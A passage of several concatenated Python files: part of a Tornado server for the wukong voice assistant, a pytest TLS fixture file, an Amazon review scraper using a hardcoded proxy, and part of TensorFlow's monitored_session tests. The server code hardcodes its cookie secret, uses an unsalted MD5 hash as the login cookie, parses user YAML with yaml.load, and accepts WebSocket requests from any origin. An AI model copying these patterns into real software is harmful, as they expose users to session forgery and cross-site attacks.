res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
self.finish()
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class ConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render('config.html', sensitivity=config.get('sensitivity'))
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
configStr = self.get_argument('config')
try:
yaml.load(configStr)
config.dump(configStr)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
except:
res = {'code': 1, 'message': 'YAML解析失败,请检查内容'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class DonateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
return
r = requests.get('https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/donate.md')
content = markdown.markdown(r.text, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('donate.html', content=content)
class APIHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ''
with open(os.path.join(constants.TEMPLATE_PATH, "api.md"), 'r') as f:
content = f.read()
content = markdown.markdown(content, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('api.html', content=content)
class UpdateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if wukong.update():
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': '更新失败,请手动更新'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class LoginHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.redirect('/')
else:
self.render('login.html', error=None)
@tornado.web.asynchronous
@gen.coroutine
def post(self):
if self.get_argument('username') == config.get('/server/username') and \
hashlib.md5(self.get_argument('password').encode('utf-8')).hexdigest() \
== config.get('/server/validate'):
self.set_cookie("validation", config.get('/server/validate'))
self.redirect("/")
else:
self.render('login.html', error="登录失败")
class LogoutHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.set_cookie("validation", '')
self.redirect("/login")
class SocketHandler(WebSocketHandler):
users = set() # 用来存放在线用户的容器
def data_received(self, chunk):
pass
def open(self):
self.users.add(self) # 建立连接后添加用户到容器中
for u in self.users: # 向已在线用户发送消息
u.write_message("{\"action_info\": \"msg\",\"msg\": \"先生您好\"}")
def on_message(self, message):
for u in self.users: # 向在线用户广播消息
u.write_message(u"")
def on_close(self):
self.users.remove(self) # 用户关闭连接后从容器中移除用户
for u in self.users:
u.write_message("")
def check_origin(self, origin):
return True # 允许WebSocket的跨域请求
'''
手动唤醒
'''
class Start(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global wukong
# wukong.run()
'''
当有语音输出调用此方法
'''
def onSay(msg):
logger.error("发送前端消息:-->" + msg)
for u in SocketHandler.users: # 向在线用户广播消息
u.write_message(msg)
settings = {
"cookie_secret": b'*\xc4bZv0\xd7\xf9\xb2\x8e\xff\xbcL\x1c\xfa\xfeh\xe1\xb8\xdb\xd1y_\x1a',
"template_path": "server/templates",
"static_path": "server/static",
"debug": False
}
application = tornado.web.Application([
(r"/", MainHandler),
(r"/login", LoginHandler),
(r"/gethistory", GetHistoryHandler),
(r"/chat", ChatHandler),
(r"/config", ConfigHandler),
(r"/getconfig", GetConfigHandler),
(r"/operate", OperateHandler),
(r"/getlog", GetLogHandler),
(r"/log", LogHandler),
(r"/logout", LogoutHandler),
(r"/api", APIHandler),
(r"/upgrade", UpdateHandler),
(r"/donate", DonateHandler),
(r"/magic", MagicHandler),
(r"/weather", WeatherHandler),
(r"/ws", SocketHandler),
(r"/start", Start)
], **settings)
def start_server(con, wk):
global conversation, wukong
conversation = con
wukong = wk
if config.get('/server/enable', False):
port = config.get('/server/port', '5000')
try:
asyncio.set_event_loop(asyncio.new_event_loop())
application.listen(int(port))
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
logger.critical('服务器启动失败: {}'.format(e))
def run(conversation, wukong):
t = threading.Thread(target=lambda: start_server(conversation, wukong))
t.start()
|
conftest.py
|
# -*- coding: utf-8 -*-
try:
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
except ImportError:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
import ssl
import tempfile
import threading
import pytest
from hackurllib.compat import urljoin
import trustme
def prepare_url(value):
# Issue #1483: Make sure the URL always has a trailing slash
httpbin_url = value.url.rstrip('/') + '/'
def inner(*suffix):
return urljoin(httpbin_url, '/'.join(suffix))
return inner
@pytest.fixture
def httpbin(httpbin):
return prepare_url(httpbin)
@pytest.fixture
def httpbin_secure(httpbin_secure):
return prepare_url(httpbin_secure)
@pytest.fixture
def nosan_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only commonName, no subjectAltName
server_cert = ca.issue_cert(common_name=u"localhost")
ca_bundle = str(tmpdir / "ca.pem")
ca.cert_pem.write_to_path(ca_bundle)
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
server_cert.configure_cert(context)
server = HTTPServer(("localhost", 0), SimpleHTTPRequestHandler)
server.socket = context.wrap_socket(server.socket, server_side=True)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
yield "localhost", server.server_address[1], ca_bundle
server.shutdown()
server_thread.join()
|
goods_review_thread.py
|
import pandas as pd
import requests
from lxml import etree
import re, time, random, datetime
from queue import Queue
import threading
class Review:
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 \
(KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36"
}
proxies = {
"http": "http://117.91.131.74:9999",
}
def __init__(self, domain):
self.view_list = []
self.page_list = []
self.url_queue = Queue()
if domain.strip().lower() == 'jp':
self.row_url = "https://www.amazon.co.jp"
elif domain.strip().lower == 'com':
self.row_url = "https://www.amazon.com"
self.s = requests.Session()
self.s.get(url=self.row_url, headers=self.headers, proxies=self.proxies)
def get_review(self, url):
res = self.s.get(url, headers=self.headers, proxies=self.proxies)
if res.status_code != 200:
print("请求出错,状态码为:%s" % res.status_code)
print(res.text)
return
res_html = etree.HTML(res.text)
# 商品评价名称
view_goods = res_html.xpath('//span[@class="a-list-item"]/a/text()')[0]
# 商品评价容器
view_con = res_html.xpath('//div[@class="a-section review aok-relative"]')
for each_view in view_con:
# 评价人
view_name = each_view.xpath('.//span[@class="a-profile-name"]/text()')[0]
view_star_raw = each_view.xpath('.//div[@class="a-row"]/a[@class="a-link-normal"]/@title')[0]
# 评价星级
view_star = view_star_raw.split(' ')[0]
# 评价title
view_title = each_view.xpath('.//a[@data-hook="review-title"]/span/text()')[0]
# 评价日期
view_date = each_view.xpath('.//span[@data-hook="review-date"]/text()')[0]
view_format = each_view.xpath('.//a[@data-hook="format-strip"]/text()')
view_colour = None
view_size = None
try:
for each in view_format:
if re.search("color|colour|色", each, re.I):
view_colour = each.split(':')[1].strip()
if re.search("size|style|サイズ", each, re.I):
view_size = each.split(":")[1].strip()
except:
pass
# 评价内容
view_body = each_view.xpath('string(.//span[@data-hook="review-body"]/span)')
# 评价有用数量
try:
view_useful_raw = each_view.xpath('.//span[@data-hook="helpful-vote-statement"]/text()')[0]
view_useful = view_useful_raw.split(' ')[0]
if view_useful == 'one':
view_useful = 1
try:
view_useful = int(view_useful)
except:
pass
except:
view_useful = 0
# 商品的评价信息表
each_view_list = [view_goods, view_name, view_star, view_title, view_date, view_colour, view_size,
view_body, view_useful]
self.view_list.append(each_view_list)
# print(self.view_list[-1])
def run(self, data):
goods_data = pd.read_excel(data, encoding='utf-8')
base_url = self.row_url + "/product-reviews/"
# goods_data.drop_duplicates(subset=['r','评价数量'],inplace=True)
for each_asin, each_count in zip(goods_data['ASIN'][5:50], goods_data['goods_review_count'][5:50]):
if each_asin and int(each_count) > 0:
if int(each_count) % 10 == 0:
end_page = int(each_count) // 10 + 1
else:
end_page = int(each_count) // 10 + 2
for page in range(1, end_page):
if page == 1:
url = base_url + each_asin
else:
url = base_url + each_asin + '?pageNumber=' + str(page)
self.url_queue.put(url)
print("review_page_%d" % page, url)
time.sleep(1.5)
while True:
try:
review_threads = [threading.Thread(target=self.get_review, args=(self.url_queue.get(),))
for m in range(30) if not self.url_queue.empty()]
for each in review_threads:
each.start()
print("队列剩余数量", self.url_queue.qsize())
for each in review_threads:
each.join()
except:
print("请求链接出错,重试中...")
pass
time.sleep(random.uniform(0.5,2.1))
if self.url_queue.empty():
break
view_goods_pd = pd.DataFrame(self.view_list,
columns=['review_goods', 'review_name', 'review_star', 'review_title',
'review_date', 'review_colour', 'review_size', 'review_body',
'review_useful'])
view_goods_pd.drop_duplicates(subset=['review_name', 'review_date','review_body'], inplace=True)
aft = datetime.datetime.now().strftime('%m%d%H%M')
file_name = r'../data/goods_review/' + "reviews_" + aft + ".xlsx"
view_goods_pd.to_excel(file_name, encoding='utf-8', engine='xlsxwriter')
print("共获取评论数量:", len(self.view_list))
if __name__ == '__main__':
data = r"../data/category/Kid's Weighted Blankets_08_28_13_22.xlsx"
review = Review(domain='com')
review.run(data=data)
|
monitored_session_test.py
|
# pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitored_session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
import glob
import os
import threading
import time
import tensorflow as tf
from tensorflow.contrib import testing
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.training import monitored_session
class ScaffoldTest(tf.test.TestCase):
"""Scaffold tests."""
def test_nothing_created_before_finalize(self):
with tf.Graph().as_default():
scaffold = tf.train.Scaffold()
self.assertEqual(None, scaffold.init_op)
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertEqual(None, scaffold.ready_op)
self.assertEqual(None, scaffold.local_init_op)
self.assertEqual(None, scaffold.saver)
def test_defaults_empty_graph(self):
with tf.Graph().as_default():
scaffold = tf.train.Scaffold()
tf.Variable(1, name='my_var')
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, tf.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, tf.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, tf.Operation))
self.assertTrue(isinstance(scaffold.saver, tf.train.Saver))
with self.test_session() as sess:
self.assertTrue(b'my_var' in sess.run(scaffold.ready_op))
sess.run([scaffold.init_op, scaffold.local_init_op])
self.assertEquals(0, len(sess.run(scaffold.ready_op)))
def test_defaults_no_variables(self):
with tf.Graph().as_default():
scaffold = tf.train.Scaffold()
tf.constant(1, name='my_const')
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, tf.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, tf.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, tf.Operation))
self.assertTrue(isinstance(scaffold.saver, tf.train.Saver))
def test_caches_values(self):
with tf.Graph().as_default():
tf.Variable([1])
scaffold1 = tf.train.Scaffold()
scaffold1.finalize()
scaffold2 = tf.train.Scaffold()
scaffold2.finalize()
self.assertEqual(scaffold1.init_op, scaffold2.init_op)
self.assertEqual(scaffold1.ready_op, scaffold2.ready_op)
self.assertEqual(scaffold1.local_init_op, scaffold2.local_init_op)
self.assertEqual(scaffold1.saver, scaffold2.saver)
def test_raise_error_if_more_than_one_cached_item(self):
with tf.Graph().as_default():
tf.Variable([1])
tf.add_to_collection(tf.GraphKeys.SAVERS, tf.train.Saver())
tf.add_to_collection(tf.GraphKeys.SAVERS, tf.train.Saver())
with self.assertRaisesRegexp(RuntimeError, 'More than one item'):
tf.train.Scaffold().finalize()
def test_uses_passed_values(self):
with tf.Graph().as_default():
tf.Variable([1])
saver = tf.train.Saver()
scaffold = tf.train.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
local_init_op=6,
saver=saver)
scaffold.finalize()
self.assertEqual(2, scaffold.init_op)
self.assertEqual(3, scaffold.init_feed_dict)
self.assertTrue(callable(scaffold.init_fn))
self.assertEqual(5, scaffold.ready_op)
self.assertEqual(6, scaffold.local_init_op)
self.assertEqual(saver, scaffold.saver)
def test_graph_is_finalized(self):
with tf.Graph().as_default():
tf.Variable([1])
tf.train.Scaffold().finalize()
with self.assertRaisesRegexp(RuntimeError,
'Graph is finalized and cannot be modified'):
tf.constant([0])
def _test_dir(temp_dir, test_name):
"""Create an empty dir to use for tests.
Args:
temp_dir: Tmp directory path.
test_name: Name of the test.
Returns:
Absolute path to the test directory.
"""
test_dir = os.path.join(temp_dir, test_name)
if os.path.isdir(test_dir):
for f in glob.glob('%s/*' % test_dir):
os.remove(f)
else:
os.makedirs(test_dir)
return test_dir
class FakeHook(tf.train.SessionRunHook):
def __init__(self):
self.should_stop = False
self.request = None
self.call_counter = Counter()
self.last_run_context = None
self.last_run_values = None
def begin(self):
self.call_counter['begin'] += 1
def before_run(self, run_context):
self.call_counter['before_run'] += 1
self.last_run_context = run_context
return self.request
def after_run(self, run_context, run_values):
self.call_counter['after_run'] += 1
self.last_run_values = run_values
if self.should_stop:
run_context.request_stop()
def end(self, session):
self.call_counter['end'] += 1
class MonitoredTrainingSessionTest(tf.test.TestCase):
"""Tests MonitoredTrainingSession."""
def test_saving_restoring_checkpoint(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
with tf.train.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with tf.train.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(2, session.run(gstep))
def test_summaries(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
new_gstep = tf.assign_add(gstep, 1)
tf.summary.scalar('my_summary_tag', new_gstep * 2)
with tf.train.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
for _ in range(101): # 100 is default summary writing steps
session.run(new_gstep)
summaries = testing.latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_custom_saving(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
fake_hook = FakeHook()
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
with tf.train.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
chief_only_hooks=[fake_hook],
save_checkpoint_secs=0) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# Check whether custom hook called or not
self.assertEqual(1, fake_hook.call_counter['begin'])
# A restart will not find the checkpoint, since we didn't save.
with tf.train.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
class StopAtNSession(monitored_session._WrappedSession):
"""A wrapped session that stops at the N-th call to _check_stop."""
def __init__(self, sess, n):
super(StopAtNSession, self).__init__(sess)
self._count = n
def _check_stop(self):
if self._count == 0:
return True
self._count -= 1
return False
class WrappedSessionTest(tf.test.TestCase):
"""_WrappedSession tests."""
def test_properties(self):
with self.test_session() as sess:
tf.constant(0.0)
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEquals(sess.graph, wrapped_sess.graph)
self.assertEquals(sess.sess_str, wrapped_sess.sess_str)
def test_should_stop_on_close(self):
with self.test_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertFalse(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
def test_should_stop_uses_check_stop(self):
with self.test_session() as sess:
wrapped_sess = StopAtNSession(sess, 3)
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertTrue(wrapped_sess.should_stop())
def test_should_stop_delegates_to_wrapped_session(self):
with self.test_session() as sess:
wrapped_sess0 = StopAtNSession(sess, 4)
wrapped_sess1 = monitored_session._WrappedSession(wrapped_sess0)
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertTrue(wrapped_sess1.should_stop())
def test_close_twice(self):
with self.test_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
def test_run(self):
with self.test_session() as sess:
c = tf.constant(0)
v = tf.identity(c)
self.assertEqual(42, sess.run(v, feed_dict={c: 42}))
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEqual(51, wrapped_sess.run(v, feed_dict={c: 51}))
def busy_wait_for_coord_stop(coord):
while not coord.should_stop():
time.sleep(0.001)
class CoordinatedSessionTest(tf.test.TestCase):
"""_CoordinatedSession tests."""
def test_properties(self):
with self.test_session() as sess:
tf.constant(0.0)
coord = tf.train.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEquals(sess.graph, coord_sess.graph)
self.assertEquals(sess.sess_str, coord_sess.sess_str)
def test_run(self):
with self.test_session() as sess:
c = tf.constant(0)
v = tf.identity(c)
coord = tf.train.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEqual(42, coord_sess.run(v, feed_dict={c: 42}))
def test_should_stop_on_close(self):
with self.test_session() as sess:
coord = tf.train.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord_sess.close()
self.assertTrue(coord_sess.should_stop())
def test_should_stop_on_coord_stop(self):
with self.test_session() as sess:
coord = tf.train.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord.request_stop()
self.assertTrue(coord_sess.should_stop())
def test_dont_request_stop_on_exception_in_main_thread(self):
with self.test_session() as sess:
c = tf.constant(0)
v = tf.identity(c)
coord = tf.train.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
self.assertEqual(0, coord_sess.run(c))
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
self.assertFalse(coord.should_stop())
self.assertFalse(coord_sess.should_stop())
def test_stop_threads_on_close_after_exception(self):
with self.test_session() as sess:
c = tf.constant(0)
v = tf.identity(c)
coord = tf.train.Coordinator()
threads = [threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(0, coord_sess.run(c))
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
for t in threads:
self.assertTrue(t.is_alive())
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
def test_stop_threads_on_close(self):
with self.test_session() as sess:
coord = tf.train.Coordinator()
threads = [threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
class AbortAtNSession(object):
"""A mock sessionthat aborts at the N-th run call."""
def __init__(self, sess, n):
self._sess = sess
self._count = n
def close(self):
pass
def run(self, *args, **kwargs):
if self._count == 0:
raise tf.errors.AbortedError('Aborted at N', None, None)
self._count -= 1
return self._sess.run(*args, **kwargs)
class RecoverableSessionTest(tf.test.TestCase):
"""_RecoverableSession tests."""
class _SessionReturner(object):
def __init__(self, sess):
self._sess = sess
def create_session(self):
return self._sess
def test_properties(self):
with self.test_session() as sess:
tf.constant(0.0)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEquals(sess.graph, recoverable_sess.graph)
self.assertEquals(sess.sess_str, recoverable_sess.sess_str)
def test_run(self):
with self.test_session() as sess:
c = tf.constant(0)
v = tf.identity(c)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
def test_recovery(self):
with self.test_session() as sess:
class StackSessionCreator(object):
def __init__(self, sess):
self.sessions_to_use = [
AbortAtNSession(sess, x + 1) for x in range(3)
]
def create_session(self):
return self.sessions_to_use.pop(0)
c = tf.constant(0)
v = tf.identity(c)
session_creator = StackSessionCreator(sess)
# List of 3 sessions to use for recovery. The first one aborts
# after 1 run() call, the second after 2 run calls, the third
# after 3 run calls.
self.assertEqual(3, len(session_creator.sessions_to_use))
# Make the recoverable session uses these 3 sessions in sequence by
# passing a factory that pops from the session_to_use list.
recoverable_sess = monitored_session._RecoverableSession(session_creator)
self.assertEqual(
2, len(session_creator.sessions_to_use)) # One session popped.
# Using first session.
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
self.assertEqual(
2, len(session_creator.sessions_to_use)) # Still 2 sessions available
# This will fail and recover by picking up the second session.
self.assertEqual(42, recoverable_sess.run(v, feed_dict={c: 42}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
self.assertEqual(33, recoverable_sess.run(v, feed_dict={c: 33}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
# This will fail and recover by picking up the last session.
self.assertEqual(24, recoverable_sess.run(v, feed_dict={c: 24}))
self.assertEqual(
0, len(session_creator.sessions_to_use)) # All sessions used.
self.assertEqual(11, recoverable_sess.run(v, feed_dict={c: 11}))
self.assertEqual(0, recoverable_sess.run(v, feed_dict={c: 0}))
# This will fail and throw a real error as the pop() will fail.
with self.assertRaisesRegexp(IndexError, 'pop from empty list'):
recoverable_sess.run(v, feed_dict={c: -12})
class FakeSession(monitored_session._WrappedSession):
def __init__(self, sess):
monitored_session._WrappedSession.__init__(self, sess)
self.args_called = {}
def run(self, fetches, **kwargs):
self.args_called = dict(kwargs)
# Call run only with fetches since we directly pass other arguments.
return monitored_session._WrappedSession.run(self, fetches)
class HookedSessionTest(tf.test.TestCase):
def testRunPassesAllArguments(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_run = FakeSession(sess)
mon_sess = monitored_session._HookedSession(sess=mock_run, hooks=[])
a_tensor = tf.constant([0], name='a_tensor')
sess.run(tf.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor,
feed_dict='a_feed',
options='an_option',
run_metadata='a_metadata')
self.assertEqual(output, [0])
self.assertEqual(mock_run.args_called, {
'feed_dict': 'a_feed',
'options': 'an_option',
'run_metadata': 'a_metadata'
})
def testCallsHooksBeginEnd(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
sess.run(tf.global_variables_initializer())
mon_sess.run(a_tensor)
for hook in [mock_hook, mock_hook2]:
self.assertEqual(
hook.last_run_values,
tf.train.SessionRunValues(
results=None,
options=config_pb2.RunOptions(),
run_metadata=config_pb2.RunMetadata()))
self.assertEqual(hook.last_run_context.original_args,
tf.train.SessionRunArgs(a_tensor))
self.assertEqual(hook.last_run_context.session, sess)
self.assertEqual(hook.call_counter['before_run'], 1)
self.assertEqual(hook.call_counter['after_run'], 1)
def testShouldStop(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
tf.constant([0], name='a_tensor')
sess.run(tf.global_variables_initializer())
mon_sess.run(fetches='a_tensor')
self.assertFalse(mon_sess.should_stop())
mock_hook.should_stop = True
mon_sess.run(fetches='a_tensor')
self.assertTrue(mon_sess.should_stop())
def testFetchesHookRequests(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
another_tensor = tf.constant([5], name='another_tensor')
third_tensor = tf.constant([10], name='third_tensor')
mock_hook.request = tf.train.SessionRunArgs([another_tensor])
mock_hook2.request = tf.train.SessionRunArgs([third_tensor])
sess.run(tf.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor)
self.assertEqual(output, [0])
self.assertEqual(mock_hook.last_run_values.results, [5])
self.assertEqual(mock_hook2.last_run_values.results, [10])
def testOnlyHooksHaveFeeds(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
b_tensor = tf.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = tf.train.SessionRunArgs(
None, feed_dict={
a_tensor: [5]
})
mock_hook2.request = tf.train.SessionRunArgs(
None, feed_dict={
b_tensor: [10]
})
sess.run(tf.global_variables_initializer())
self.assertEqual(mon_sess.run(fetches=add_tensor), [15])
def testBothHooksAndUserHaveFeeds(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
b_tensor = tf.constant([0], name='b_tensor')
c_tensor = tf.constant([0], name='c_tensor')
add_tensor = a_tensor + b_tensor + c_tensor
mock_hook.request = tf.train.SessionRunArgs(
None, feed_dict={
a_tensor: [5]
})
mock_hook2.request = tf.train.SessionRunArgs(
None, feed_dict={
b_tensor: [10]
})
sess.run(tf.global_variables_initializer())
feed_dict = {c_tensor: [20]}
self.assertEqual(
mon_sess.run(fetches=add_tensor, feed_dict=feed_dict), [35])
# User feed_dict should not be changed
self.assertEqual(len(feed_dict), 1)
def testHooksFeedConflicts(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
b_tensor = tf.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = tf.train.SessionRunArgs(
None, feed_dict={
a_tensor: [5]
})
mock_hook2.request = tf.train.SessionRunArgs(
None, feed_dict={
a_tensor: [10]
})
sess.run(tf.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor)
def testHooksAndUserFeedConflicts(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
b_tensor = tf.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = tf.train.SessionRunArgs(
None, feed_dict={
a_tensor: [5]
})
mock_hook2.request = tf.train.SessionRunArgs(
None, feed_dict={
b_tensor: [10]
})
sess.run(tf.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor, feed_dict={b_tensor: [10]})
class RaiseOnceAtCountN(tf.train.SessionRunHook):
"""Hook that raises an Exception at step N."""
def __init__(self, n, ex):
self.n = n
self.ex = ex
self.raised = False
def before_run(self, run_context):
# Raise the first time we reach step N.
self.n -= 1
if 0 == self.n and not self.raised:
self.raised = True
raise self.ex
return None
class RunOptionsMetadataHook(tf.train.SessionRunHook):
"""A hook that observes & optionally modifies RunOptions and RunMetadata."""
def __init__(self, trace_level, timeout_in_ms, output_partition_graphs,
debug_tensor_watch):
self._trace_level = trace_level
